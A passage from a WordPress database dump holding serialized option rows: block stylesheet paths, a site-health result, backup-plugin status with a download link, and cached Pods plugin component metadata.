s\";i:183;s:23:\"freeform/editor.min.css\";i:184;s:22:\"gallery/editor-rtl.css\";i:185;s:26:\"gallery/editor-rtl.min.css\";i:186;s:18:\"gallery/editor.css\";i:187;s:22:\"gallery/editor.min.css\";i:188;s:21:\"gallery/style-rtl.css\";i:189;s:25:\"gallery/style-rtl.min.css\";i:190;s:17:\"gallery/style.css\";i:191;s:21:\"gallery/style.min.css\";i:192;s:21:\"gallery/theme-rtl.css\";i:193;s:25:\"gallery/theme-rtl.min.css\";i:194;s:17:\"gallery/theme.css\";i:195;s:21:\"gallery/theme.min.css\";i:196;s:20:\"group/editor-rtl.css\";i:197;s:24:\"group/editor-rtl.min.css\";i:198;s:16:\"group/editor.css\";i:199;s:20:\"group/editor.min.css\";i:200;s:19:\"group/style-rtl.css\";i:201;s:23:\"group/style-rtl.min.css\";i:202;s:15:\"group/style.css\";i:203;s:19:\"group/style.min.css\";i:204;s:19:\"group/theme-rtl.css\";i:205;s:23:\"group/theme-rtl.min.css\";i:206;s:15:\"group/theme.css\";i:207;s:19:\"group/theme.min.css\";i:208;s:21:\"heading/style-rtl.css\";i:209;s:25:\"heading/style-rtl.min.css\";i:210;s:17:\"heading/style.css\";i:211;s:21:\"heading/style.min.css\";i:212;s:19:\"html/editor-rtl.css\";i:213;s:23:\"html/editor-rtl.min.css\";i:214;s:15:\"html/editor.css\";i:215;s:19:\"html/editor.min.css\";i:216;s:20:\"image/editor-rtl.css\";i:217;s:24:\"image/editor-rtl.min.css\";i:218;s:16:\"image/editor.css\";i:219;s:20:\"image/editor.min.css\";i:220;s:19:\"image/style-rtl.css\";i:221;s:23:\"image/style-rtl.min.css\";i:222;s:15:\"image/style.css\";i:223;s:19:\"image/style.min.css\";i:224;s:19:\"image/theme-rtl.css\";i:225;s:23:\"image/theme-rtl.min.css\";i:226;s:15:\"image/theme.css\";i:227;s:19:\"image/theme.min.css\";i:228;s:29:\"latest-comments/style-rtl.css\";i:229;s:33:\"latest-comments/style-rtl.min.css\";i:230;s:25:\"latest-comments/style.css\";i:231;s:29:\"latest-comments/style.min.css\";i:232;s:27:\"latest-posts/editor-rtl.css\";i:233;s:31:\"latest-posts/editor-rtl.min.css\";i:234;s:23:\"latest-posts/editor.css\";i:235;s:27:\"latest-posts/editor.min.css\";i:236;s:26:\"latest-posts/style-rtl.css\";i:237;s:30:\"latest-posts/style-rtl.min.css\";i:238;s:22:\"latest-posts/style.css\";i:239;s:26:\"latest-posts/style.min.css\";i:240;s:18:\"list/style-rtl.css\";i:241;s:22:\"list/style-rtl.min.css\";i:242;s:14:\"list/style.css\";i:243;s:18:\"list/style.min.css\";i:244;s:22:\"loginout/style-rtl.css\";i:245;s:26:\"loginout/style-rtl.min.css\";i:246;s:18:\"loginout/style.css\";i:247;s:22:\"loginout/style.min.css\";i:248;s:19:\"math/editor-rtl.css\";i:249;s:23:\"math/editor-rtl.min.css\";i:250;s:15:\"math/editor.css\";i:251;s:19:\"math/editor.min.css\";i:252;s:18:\"math/style-rtl.css\";i:253;s:22:\"math/style-rtl.min.css\";i:254;s:14:\"math/style.css\";i:255;s:18:\"math/style.min.css\";i:256;s:25:\"media-text/editor-rtl.css\";i:257;s:29:\"media-text/editor-rtl.min.css\";i:258;s:21:\"media-text/editor.css\";i:259;s:25:\"media-text/editor.min.css\";i:260;s:24:\"media-text/style-rtl.css\";i:261;s:28:\"media-text/style-rtl.min.css\";i:262;s:20:\"media-text/style.css\";i:263;s:24:\"media-text/style.min.css\";i:264;s:19:\"more/editor-rtl.css\";i:265;s:23:\"more/editor-rtl.min.css\";i:266;s:15:\"more/editor.css\";i:267;s:19:\"more/editor.min.css\";i:268;s:30:\"navigation-link/editor-rtl.css\";i:269;s:34:\"navigation-link/editor-rtl.min.css\";i:270;s:26:\"navigation-link/editor.css\";i:271;s:30:\"navigation-link/editor.min.css\";i:272;s:29:\"navigation-link/style-rtl.css\";i:273;s:33:\"navigation-link/style-rtl.min.css\";i:274;s:25:\"navigation-link/style.css\";i:275;s:29:\"navigation-link/style.min.css\";i:276;s:33:\"navigation-submenu/editor-rtl.css\";i:277;s:37:\"navigation-submenu/editor-rtl.min.css\";i:278;s:29:\"navigation-submenu/editor.css\";i:279;s:33:\"navigation-submenu/editor.min.css\";i:280;s:25:\"navigation/editor-rtl.css\";i:281;s:29:\"navigation/editor-rtl.min.css\";i:282;s:21:\"navigation/editor.css\";i:283;s:25:\"navigation/editor.min.css\";i:284;s:24:\"navigation/style-rtl.css\";i:285;s:28:\"navigation/style-rtl.min.css\";i:286;s:20:\"navigation/style.css\";i:287;s:24:\"navigation/style.min.css\";i:288;s:23:\"nextpage/editor-rtl.css\";i:289;s:27:\"nextpage/editor-rtl.min.css\";i:290;s:19:\"nextpage/editor.css\";i:291;s:23:\"nextpage/editor.min.css\";i:292;s:24:\"page-list/editor-rtl.css\";i:293;s:28:\"page-list/editor-rtl.min.css\";i:294;s:20:\"page-list/editor.css\";i:295;s:24:\"page-list/editor.min.css\";i:296;s:23:\"page-list/style-rtl.css\";i:297;s:27:\"page-list/style-rtl.min.css\";i:298;s:19:\"page-list/style.css\";i:299;s:23:\"page-list/style.min.css\";i:300;s:24:\"paragraph/editor-rtl.css\";i:301;s:28:\"paragraph/editor-rtl.min.css\";i:302;s:20:\"paragraph/editor.css\";i:303;s:24:\"paragraph/editor.min.css\";i:304;s:23:\"paragraph/style-rtl.css\";i:305;s:27:\"paragraph/style-rtl.min.css\";i:306;s:19:\"paragraph/style.css\";i:307;s:23:\"paragraph/style.min.css\";i:308;s:35:\"post-author-biography/style-rtl.css\";i:309;s:39:\"post-author-biography/style-rtl.min.css\";i:310;s:31:\"post-author-biography/style.css\";i:311;s:35:\"post-author-biography/style.min.css\";i:312;s:30:\"post-author-name/style-rtl.css\";i:313;s:34:\"post-author-name/style-rtl.min.css\";i:314;s:26:\"post-author-name/style.css\";i:315;s:30:\"post-author-name/style.min.css\";i:316;s:25:\"post-author/style-rtl.css\";i:317;s:29:\"post-author/style-rtl.min.css\";i:318;s:21:\"post-author/style.css\";i:319;s:25:\"post-author/style.min.css\";i:320;s:33:\"post-comments-count/style-rtl.css\";i:321;s:37:\"post-comments-count/style-rtl.min.css\";i:322;s:29:\"post-comments-count/style.css\";i:323;s:33:\"post-comments-count/style.min.css\";i:324;s:33:\"post-comments-form/editor-rtl.css\";i:325;s:37:\"post-comments-form/editor-rtl.min.css\";i:326;s:29:\"post-comments-form/editor.css\";i:327;s:33:\"post-comments-form/editor.min.css\";i:328;s:32:\"post-comments-form/style-rtl.css\";i:329;s:36:\"post-comments-form/style-rtl.min.css\";i:330;s:28:\"post-comments-form/style.css\";i:331;s:32:\"post-comments-form/style.min.css\";i:332;s:32:\"post-comments-link/style-rtl.css\";i:333;s:36:\"post-comments-link/style-rtl.min.css\";i:334;s:28:\"post-comments-link/style.css\";i:335;s:32:\"post-comments-link/style.min.css\";i:336;s:26:\"post-content/style-rtl.css\";i:337;s:30:\"post-content/style-rtl.min.css\";i:338;s:22:\"post-content/style.css\";i:339;s:26:\"post-content/style.min.css\";i:340;s:23:\"post-date/style-rtl.css\";i:341;s:27:\"post-date/style-rtl.min.css\";i:342;s:19:\"post-date/style.css\";i:343;s:23:\"post-date/style.min.css\";i:344;s:27:\"post-excerpt/editor-rtl.css\";i:345;s:31:\"post-excerpt/editor-rtl.min.css\";i:346;s:23:\"post-excerpt/editor.css\";i:347;s:27:\"post-excerpt/editor.min.css\";i:348;s:26:\"post-excerpt/style-rtl.css\";i:349;s:30:\"post-excerpt/style-rtl.min.css\";i:350;s:22:\"post-excerpt/style.css\";i:351;s:26:\"post-excerpt/style.min.css\";i:352;s:34:\"post-featured-image/editor-rtl.css\";i:353;s:38:\"post-featured-image/editor-rtl.min.css\";i:354;s:30:\"post-featured-image/editor.css\";i:355;s:34:\"post-featured-image/editor.min.css\";i:356;s:33:\"post-featured-image/style-rtl.css\";i:357;s:37:\"post-featured-image/style-rtl.min.css\";i:358;s:29:\"post-featured-image/style.css\";i:359;s:33:\"post-featured-image/style.min.css\";i:360;s:34:\"post-navigation-link/style-rtl.css\";i:361;s:38:\"post-navigation-link/style-rtl.min.css\";i:362;s:30:\"post-navigation-link/style.css\";i:363;s:34:\"post-navigation-link/style.min.css\";i:364;s:27:\"post-template/style-rtl.css\";i:365;s:31:\"post-template/style-rtl.min.css\";i:366;s:23:\"post-template/style.css\";i:367;s:27:\"post-template/style.min.css\";i:368;s:24:\"post-terms/style-rtl.css\";i:369;s:28:\"post-terms/style-rtl.min.css\";i:370;s:20:\"post-terms/style.css\";i:371;s:24:\"post-terms/style.min.css\";i:372;s:31:\"post-time-to-read/style-rtl.css\";i:373;s:35:\"post-time-to-read/style-rtl.min.css\";i:374;s:27:\"post-time-to-read/style.css\";i:375;s:31:\"post-time-to-read/style.min.css\";i:376;s:24:\"post-title/style-rtl.css\";i:377;s:28:\"post-title/style-rtl.min.css\";i:378;s:20:\"post-title/style.css\";i:379;s:24:\"post-title/style.min.css\";i:380;s:26:\"preformatted/style-rtl.css\";i:381;s:30:\"preformatted/style-rtl.min.css\";i:382;s:22:\"preformatted/style.css\";i:383;s:26:\"preformatted/style.min.css\";i:384;s:24:\"pullquote/editor-rtl.css\";i:385;s:28:\"pullquote/editor-rtl.min.css\";i:386;s:20:\"pullquote/editor.css\";i:387;s:24:\"pullquote/editor.min.css\";i:388;s:23:\"pullquote/style-rtl.css\";i:389;s:27:\"pullquote/style-rtl.min.css\";i:390;s:19:\"pullquote/style.css\";i:391;s:23:\"pullquote/style.min.css\";i:392;s:23:\"pullquote/theme-rtl.css\";i:393;s:27:\"pullquote/theme-rtl.min.css\";i:394;s:19:\"pullquote/theme.css\";i:395;s:23:\"pullquote/theme.min.css\";i:396;s:39:\"query-pagination-numbers/editor-rtl.css\";i:397;s:43:\"query-pagination-numbers/editor-rtl.min.css\";i:398;s:35:\"query-pagination-numbers/editor.css\";i:399;s:39:\"query-pagination-numbers/editor.min.css\";i:400;s:31:\"query-pagination/editor-rtl.css\";i:401;s:35:\"query-pagination/editor-rtl.min.css\";i:402;s:27:\"query-pagination/editor.css\";i:403;s:31:\"query-pagination/editor.min.css\";i:404;s:30:\"query-pagination/style-rtl.css\";i:405;s:34:\"query-pagination/style-rtl.min.css\";i:406;s:26:\"query-pagination/style.css\";i:407;s:30:\"query-pagination/style.min.css\";i:408;s:25:\"query-title/style-rtl.css\";i:409;s:29:\"query-title/style-rtl.min.css\";i:410;s:21:\"query-title/style.css\";i:411;s:25:\"query-title/style.min.css\";i:412;s:25:\"query-total/style-rtl.css\";i:413;s:29:\"query-total/style-rtl.min.css\";i:414;s:21:\"query-total/style.css\";i:415;s:25:\"query-total/style.min.css\";i:416;s:20:\"query/editor-rtl.css\";i:417;s:24:\"query/editor-rtl.min.css\";i:418;s:16:\"query/editor.css\";i:419;s:20:\"query/editor.min.css\";i:420;s:19:\"quote/style-rtl.css\";i:421;s:23:\"quote/style-rtl.min.css\";i:422;s:15:\"quote/style.css\";i:423;s:19:\"quote/style.min.css\";i:424;s:19:\"quote/theme-rtl.css\";i:425;s:23:\"quote/theme-rtl.min.css\";i:426;s:15:\"quote/theme.css\";i:427;s:19:\"quote/theme.min.css\";i:428;s:23:\"read-more/style-rtl.css\";i:429;s:27:\"read-more/style-rtl.min.css\";i:430;s:19:\"read-more/style.css\";i:431;s:23:\"read-more/style.min.css\";i:432;s:18:\"rss/editor-rtl.css\";i:433;s:22:\"rss/editor-rtl.min.css\";i:434;s:14:\"rss/editor.css\";i:435;s:18:\"rss/editor.min.css\";i:436;s:17:\"rss/style-rtl.css\";i:437;s:21:\"rss/style-rtl.min.css\";i:438;s:13:\"rss/style.css\";i:439;s:17:\"rss/style.min.css\";i:440;s:21:\"search/editor-rtl.css\";i:441;s:25:\"search/editor-rtl.min.css\";i:442;s:17:\"search/editor.css\";i:443;s:21:\"search/editor.min.css\";i:444;s:20:\"search/style-rtl.css\";i:445;s:24:\"search/style-rtl.min.css\";i:446;s:16:\"search/style.css\";i:447;s:20:\"search/style.min.css\";i:448;s:20:\"search/theme-rtl.css\";i:449;s:24:\"search/theme-rtl.min.css\";i:450;s:16:\"search/theme.css\";i:451;s:20:\"search/theme.min.css\";i:452;s:24:\"separator/editor-rtl.css\";i:453;s:28:\"separator/editor-rtl.min.css\";i:454;s:20:\"separator/editor.css\";i:455;s:24:\"separator/editor.min.css\";i:456;s:23:\"separator/style-rtl.css\";i:457;s:27:\"separator/style-rtl.min.css\";i:458;s:19:\"separator/style.css\";i:459;s:23:\"separator/style.min.css\";i:460;s:23:\"separator/theme-rtl.css\";i:461;s:27:\"separator/theme-rtl.min.css\";i:462;s:19:\"separator/theme.css\";i:463;s:23:\"separator/theme.min.css\";i:464;s:24:\"shortcode/editor-rtl.css\";i:465;s:28:\"shortcode/editor-rtl.min.css\";i:466;s:20:\"shortcode/editor.css\";i:467;s:24:\"shortcode/editor.min.css\";i:468;s:24:\"site-logo/editor-rtl.css\";i:469;s:28:\"site-logo/editor-rtl.min.css\";i:470;s:20:\"site-logo/editor.css\";i:471;s:24:\"site-logo/editor.min.css\";i:472;s:23:\"site-logo/style-rtl.css\";i:473;s:27:\"site-logo/style-rtl.min.css\";i:474;s:19:\"site-logo/style.css\";i:475;s:23:\"site-logo/style.min.css\";i:476;s:27:\"site-tagline/editor-rtl.css\";i:477;s:31:\"site-tagline/editor-rtl.min.css\";i:478;s:23:\"site-tagline/editor.css\";i:479;s:27:\"site-tagline/editor.min.css\";i:480;s:26:\"site-tagline/style-rtl.css\";i:481;s:30:\"site-tagline/style-rtl.min.css\";i:482;s:22:\"site-tagline/style.css\";i:483;s:26:\"site-tagline/style.min.css\";i:484;s:25:\"site-title/editor-rtl.css\";i:485;s:29:\"site-title/editor-rtl.min.css\";i:486;s:21:\"site-title/editor.css\";i:487;s:25:\"site-title/editor.min.css\";i:488;s:24:\"site-title/style-rtl.css\";i:489;s:28:\"site-title/style-rtl.min.css\";i:490;s:20:\"site-title/style.css\";i:491;s:24:\"site-title/style.min.css\";i:492;s:26:\"social-link/editor-rtl.css\";i:493;s:30:\"social-link/editor-rtl.min.css\";i:494;s:22:\"social-link/editor.css\";i:495;s:26:\"social-link/editor.min.css\";i:496;s:27:\"social-links/editor-rtl.css\";i:497;s:31:\"social-links/editor-rtl.min.css\";i:498;s:23:\"social-links/editor.css\";i:499;s:27:\"social-links/editor.min.css\";i:500;s:26:\"social-links/style-rtl.css\";i:501;s:30:\"social-links/style-rtl.min.css\";i:502;s:22:\"social-links/style.css\";i:503;s:26:\"social-links/style.min.css\";i:504;s:21:\"spacer/editor-rtl.css\";i:505;s:25:\"spacer/editor-rtl.min.css\";i:506;s:17:\"spacer/editor.css\";i:507;s:21:\"spacer/editor.min.css\";i:508;s:20:\"spacer/style-rtl.css\";i:509;s:24:\"spacer/style-rtl.min.css\";i:510;s:16:\"spacer/style.css\";i:511;s:20:\"spacer/style.min.css\";i:512;s:20:\"table/editor-rtl.css\";i:513;s:24:\"table/editor-rtl.min.css\";i:514;s:16:\"table/editor.css\";i:515;s:20:\"table/editor.min.css\";i:516;s:19:\"table/style-rtl.css\";i:517;s:23:\"table/style-rtl.min.css\";i:518;s:15:\"table/style.css\";i:519;s:19:\"table/style.min.css\";i:520;s:19:\"table/theme-rtl.css\";i:521;s:23:\"table/theme-rtl.min.css\";i:522;s:15:\"table/theme.css\";i:523;s:19:\"table/theme.min.css\";i:524;s:24:\"tag-cloud/editor-rtl.css\";i:525;s:28:\"tag-cloud/editor-rtl.min.css\";i:526;s:20:\"tag-cloud/editor.css\";i:527;s:24:\"tag-cloud/editor.min.css\";i:528;s:23:\"tag-cloud/style-rtl.css\";i:529;s:27:\"tag-cloud/style-rtl.min.css\";i:530;s:19:\"tag-cloud/style.css\";i:531;s:23:\"tag-cloud/style.min.css\";i:532;s:28:\"template-part/editor-rtl.css\";i:533;s:32:\"template-part/editor-rtl.min.css\";i:534;s:24:\"template-part/editor.css\";i:535;s:28:\"template-part/editor.min.css\";i:536;s:27:\"template-part/theme-rtl.css\";i:537;s:31:\"template-part/theme-rtl.min.css\";i:538;s:23:\"template-part/theme.css\";i:539;s:27:\"template-part/theme.min.css\";i:540;s:24:\"term-count/style-rtl.css\";i:541;s:28:\"term-count/style-rtl.min.css\";i:542;s:20:\"term-count/style.css\";i:543;s:24:\"term-count/style.min.css\";i:544;s:30:\"term-description/style-rtl.css\";i:545;s:34:\"term-description/style-rtl.min.css\";i:546;s:26:\"term-description/style.css\";i:547;s:30:\"term-description/style.min.css\";i:548;s:23:\"term-name/style-rtl.css\";i:549;s:27:\"term-name/style-rtl.min.css\";i:550;s:19:\"term-name/style.css\";i:551;s:23:\"term-name/style.min.css\";i:552;s:28:\"term-template/editor-rtl.css\";i:553;s:32:\"term-template/editor-rtl.min.css\";i:554;s:24:\"term-template/editor.css\";i:555;s:28:\"term-template/editor.min.css\";i:556;s:27:\"term-template/style-rtl.css\";i:557;s:31:\"term-template/style-rtl.min.css\";i:558;s:23:\"term-template/style.css\";i:559;s:27:\"term-template/style.min.css\";i:560;s:27:\"text-columns/editor-rtl.css\";i:561;s:31:\"text-columns/editor-rtl.min.css\";i:562;s:23:\"text-columns/editor.css\";i:563;s:27:\"text-columns/editor.min.css\";i:564;s:26:\"text-columns/style-rtl.css\";i:565;s:30:\"text-columns/style-rtl.min.css\";i:566;s:22:\"text-columns/style.css\";i:567;s:26:\"text-columns/style.min.css\";i:568;s:19:\"verse/style-rtl.css\";i:569;s:23:\"verse/style-rtl.min.css\";i:570;s:15:\"verse/style.css\";i:571;s:19:\"verse/style.min.css\";i:572;s:20:\"video/editor-rtl.css\";i:573;s:24:\"video/editor-rtl.min.css\";i:574;s:16:\"video/editor.css\";i:575;s:20:\"video/editor.min.css\";i:576;s:19:\"video/style-rtl.css\";i:577;s:23:\"video/style-rtl.min.css\";i:578;s:15:\"video/style.css\";i:579;s:19:\"video/style.min.css\";i:580;s:19:\"video/theme-rtl.css\";i:581;s:23:\"video/theme-rtl.min.css\";i:582;s:15:\"video/theme.css\";i:583;s:19:\"video/theme.min.css\";}}','on'),(5301285,'_transient_health-check-site-status-result','{\"good\":16,\"recommended\":9,\"critical\":1}','on'),(5301288,'ai1wm_sites_links','a:0:{}','auto'),(5301289,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:352:\"<a href=\"https://ekmsliberia.info/wp-content/ai1wm-backups/ekmsliberia-info-20260609-170112-8hdqff0z24sk.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"ekmsliberia.info\" download=\"ekmsliberia-info-20260609-170112-8hdqff0z24sk.wpress\">\n							<span>Download ekmsliberia.info</span>\n							<em>Size: 2 GB</em>\n							</a>\";}','auto'),(5301287,'ai1wm_backups_labels','a:0:{}','auto'),(5633376,'_transient_timeout_pods_pods_components-3282','1782346770','off'),(5633377,'_transient_pods_pods_components-3282','a:13:{s:22:\"advanced-content-types\";a:28:{s:2:\"ID\";s:22:\"advanced-content-types\";s:4:\"Name\";s:22:\"Advanced Content Types\";s:9:\"ShortName\";s:22:\"Advanced Content Types\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:22:\"Advanced Content Types\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:252:\"A content type that exists outside of the WordPress post and postmeta table and uses custom tables instead. You most likely don\'t need these and we strongly recommend that you use Custom Post Types or Custom Taxonomies instead. FOR ADVANCED USERS ONLY.\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"2.3\";s:8:\"Category\";s:8:\"Advanced\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:27:\"Pods_Advanced_Content_Types\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:0:\"\";s:8:\"External\";b:0;s:4:\"File\";s:26:\"Advanced-Content-Types.php\";}s:22:\"advanced-relationships\";a:28:{s:2:\"ID\";s:22:\"advanced-relationships\";s:4:\"Name\";s:22:\"Advanced Relationships\";s:9:\"ShortName\";s:22:\"Advanced Relationships\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:22:\"Advanced Relationships\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:187:\"Add advanced relationship objects for relating to including Database Tables, Multisite Networks, Multisite Sites, Themes, Page Templates, Sidebars, Post Type Objects, and Taxonomy Objects\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"2.3\";s:8:\"Category\";s:8:\"Advanced\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:27:\"Pods_Advanced_Relationships\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:0:\"\";s:8:\"External\";b:0;s:4:\"File\";s:26:\"Advanced-Relationships.php\";}s:19:\"builder-integration\";a:28:{s:2:\"ID\";s:19:\"builder-integration\";s:4:\"Name\";s:19:\"Builder Integration\";s:9:\"ShortName\";s:19:\"Builder Integration\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:19:\"Builder Integration\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:169:\"Integration with the <a href=\"http://ithemes.com/\">Builder</a> theme / child themes from <a href=\"http://ithemes.com/\">iThemes</a>; Adds new modules to the Layout engine\";s:10:\"Deprecated\";s:3:\"Yes\";s:19:\"DeprecatedInVersion\";s:6:\"2.9.13\";s:24:\"DeprecatedRemovalVersion\";s:3:\"3.1\";s:7:\"Version\";s:3:\"1.0\";s:8:\"Category\";s:11:\"Integration\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:12:\"Pods_Builder\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:29:\"pods-builder/pods-builder.php\";s:8:\"External\";b:0;s:4:\"File\";s:19:\"Builder/Builder.php\";}s:15:\"markdown-syntax\";a:28:{s:2:\"ID\";s:15:\"markdown-syntax\";s:4:\"Name\";s:15:\"Markdown Syntax\";s:9:\"ShortName\";s:15:\"Markdown Syntax\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:15:\"Markdown Syntax\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:158:\"Integration with Markdown (via Parsedown https://github.com/erusev/parsedown); Adds an option to enable Markdown syntax for Paragraph Text and WYSIWYG fields.\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"2.0\";s:8:\"Category\";s:11:\"Field Types\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:13:\"Pods_Markdown\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:0:\"\";s:8:\"External\";b:0;s:4:\"File\";s:12:\"Markdown.php\";}s:53:\"migrate-import-from-the-advanced-custom-fields-plugin\";a:28:{s:2:\"ID\";s:53:\"migrate-import-from-the-advanced-custom-fields-plugin\";s:4:\"Name\";s:54:\"Migrate: Import from the Advanced Custom Fields plugin\";s:9:\"ShortName\";s:54:\"Migrate: Import from the Advanced Custom Fields plugin\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:11:\"Migrate ACF\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:258:\"Import Custom Post Types and Taxonomies from the Advanced Custom Fields (<a href=\"https://wordpress.org/plugins/advanced-custom-fields/\">https://wordpress.org/plugins/advanced-custom-fields/</a>). This does NOT migrate custom fields or field groups from ACF.\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"1.0\";s:8:\"Category\";s:9:\"Migration\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:16:\"Pods_Migrate_ACF\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:37:\"pods-migrate-acf/pods-migrate-acf.php\";s:8:\"External\";b:0;s:4:\"File\";s:27:\"Migrate-ACF/Migrate-ACF.php\";}s:50:\"migrate-import-from-the-custom-post-type-ui-plugin\";a:28:{s:2:\"ID\";s:50:\"migrate-import-from-the-custom-post-type-ui-plugin\";s:4:\"Name\";s:51:\"Migrate: Import from the Custom Post Type UI plugin\";s:9:\"ShortName\";s:51:\"Migrate: Import from the Custom Post Type UI plugin\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:14:\"Migrate CPT UI\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:182:\"Import Custom Post Types and Taxonomies from Custom Post Type UI (<a href=\"https://wordpress.org/plugins/custom-post-type-ui/\">https://wordpress.org/plugins/custom-post-type-ui/</a>)\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"1.0\";s:8:\"Category\";s:9:\"Migration\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:18:\"Pods_Migrate_CPTUI\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:69:\"pods-migrate-custom-post-type-ui/pods-migrate-custom-post-type-ui.php\";s:8:\"External\";b:0;s:4:\"File\";s:31:\"Migrate-CPTUI/Migrate-CPTUI.php\";}s:16:\"migrate-packages\";a:28:{s:2:\"ID\";s:16:\"migrate-packages\";s:4:\"Name\";s:22:\"Import/Export Packages\";s:9:\"ShortName\";s:22:\"Import/Export Packages\";s:10:\"PluginName\";s:0:\"\";s:13:\"ComponentName\";s:0:\"\";s:3:\"URI\";s:0:\"\";s:8:\"MenuName\";s:22:\"Import/Export Packages\";s:8:\"MenuPage\";s:0:\"\";s:11:\"MenuAddPage\";s:0:\"\";s:7:\"MustUse\";b:0;s:11:\"Description\";s:121:\"Import/Export your Pods, Fields, and other settings from any Pods site; Includes an API to Import/Export Packages via PHP\";s:10:\"Deprecated\";s:0:\"\";s:19:\"DeprecatedInVersion\";s:0:\"\";s:24:\"DeprecatedRemovalVersion\";s:0:\"\";s:7:\"Version\";s:3:\"2.0\";s:8:\"Category\";s:9:\"Migration\";s:6:\"Author\";s:0:\"\";s:9:\"AuthorURI\";s:0:\"\";s:5:\"Class\";s:21:\"Pods_Migrate_Packages\";s:4:\"Hide\";s:0:\"\";s:16:\"PluginDependency\";s:0:\"\";s:15:\"ThemeDependency\";s:0:\"\";s:13:\"DeveloperMode\";b:0;s:13:\"TablelessMode\";b:0;s:10:\"Capability\";s:0:\"\";s:6:\"Plugin\";s:47:\"pods-migrate-packages/pods-migrate-packages.php\";s:8:\"External\";b:0;s:4:\"File\";s:37:\"Migrate-Packages/Migrate-Packages.php\";}s:63:\"migrate-pod-page-and-pod-template-php-into-file-based-templates\";a:28:{s:2:\"ID\";s:63:\"migrate-pod-page-and-pod-template-php-into-file-based-templates\";s:4:\"Name\";s:64:\"Migrate: Pod Page and Pod Template PHP into File-based templates\";s:9:\"ShortName\";s:64:\"Migrate: Pod Page and Pod Template PHP into File-based 